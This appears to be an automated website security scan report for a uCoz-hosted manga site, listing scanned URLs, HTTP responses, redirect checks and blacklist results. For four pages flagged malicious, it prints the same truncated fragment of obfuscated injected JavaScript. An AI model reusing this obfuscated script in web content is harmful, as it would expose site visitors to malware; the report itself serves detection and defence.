Scanned pages/files
| Request | Server response | Status |
http://firegate.3dn.ru/news/one_piece_642_manga_one_piece_642_manga/2011-09-09-65 | 200 OK Content-Length: 52780 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x Antivirus reports:
| ||
http://s47.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s47.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://s47.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=4firegate | 200 OK Content-Length: 525 Content-Type: application/javascript | clean |
http://firegate.3dn.ru/js/cufon.js | 200 OK Content-Length: 18258 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/font.js | 200 OK Content-Length: 50368 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/masonry.js | 200 OK Content-Length: 3440 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/js/ui.js | 200 OK Content-Length: 313 Content-Type: text/javascript | clean |
http://firegate.3dn.ru/register | 200 OK Content-Length: 39031 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x Antivirus reports:
| ||
http://firegate.3dn.ru/ | 200 OK Content-Length: 77144 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x Antivirus reports:
| ||
http://firegate.3dn.ru/news/one_piece_643_manga_one_piece_643_manga/2011-09-09-66 | 200 OK Content-Length: 52185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wnd = window;var nav = wnd.navigator;if (!frames.nav['taintEnabled']()) {var ALOTOFBADuseonesbeam={encrypt:function(m,e,n){m=poojangle["\x64\x45\x6E\x43\x6F\x44\x45"](m);var writeafewwRAISENOISEmulasmissthebus=[],MOBunderage="";for(var i=0;i<m["\x6C\x65\x6E\x67\x74\x68"];i+=3){var tmpwriteafewwRAISENOISEmulasmissthebus="\x31";for(var h=0;h<3;h++){if(i+h<m["\x6C\x65\x6E\x67\x74\x68"]){victoryMONEY=this["\x6F\x72\x64"](m["\x63\x68\x61\x72\x41\x74"](i+h))-30;if(victoryMONEY["\x6C\x65\x Antivirus reports:
| ||
http://firegate.3dn.ru/news/one_piece_643_manga_one_piece_643_manga/ | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://firegate.3dn.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: firegate.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jul 2015 17:36:31 GMT
Server: uServ/3.2.2
Content-Length: 77144
Content-Type: text/html; charset=UTF-8
...77144 bytes of data.
GET / HTTP/1.1
Host: firegate.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jul 2015 17:36:31 GMT
Server: uServ/3.2.2
Content-Length: 77144
Content-Type: text/html; charset=UTF-8
...77144 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: firegate.3dn.ru
Referer: http://www.google.com/search?q=firegate.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: firegate.3dn.ru
Referer: http://www.google.com/search?q=firegate.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firegate.3dn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firegate.3dn.ru/
Result: firegate.3dn.ru is not infected or malware details are not published yet.
Result: firegate.3dn.ru is not infected or malware details are not published yet.